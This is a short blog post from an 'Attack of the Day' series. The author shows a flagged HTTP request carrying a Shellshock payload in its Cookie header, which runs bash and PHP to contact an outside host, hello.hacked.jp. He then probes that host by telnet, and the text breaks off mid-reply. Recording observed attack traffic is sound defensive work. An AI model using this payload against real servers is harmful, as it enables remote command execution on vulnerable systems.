Clever Domain Name

Posted Leave a commentPosted in Attack of the Day

Saw this get flagged on Friday. ¬†The domain “hacked.jp” showing up in a questionable HTTP request kind of indicates the owner really¬†thought through their plans. GET /cgi-sys/entropysearch.cgi HTTP/1.1 Content-Type: text/html Cookie: () { x;};echo;/bin/bash -c “php -r \”file_get_contents(‘http://hello.hacked.jp/hello/?l=planetspork.com’);\”” Host: planetspork.com Accept: text/html, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19 X-Forwarded-For: 77.79.40.195 A guy might be curious what lived at hello.hacked.jp, I know I was. Lappy486:arf imhoff$ telnet hello.hacked.jp 80 Trying 31.184.192.233… Connected to hello.hacked.jp. Escape character is ‘^]’. GET /hello/?l=planetspork.com HTTP/1.0 HTTP/1.1 […]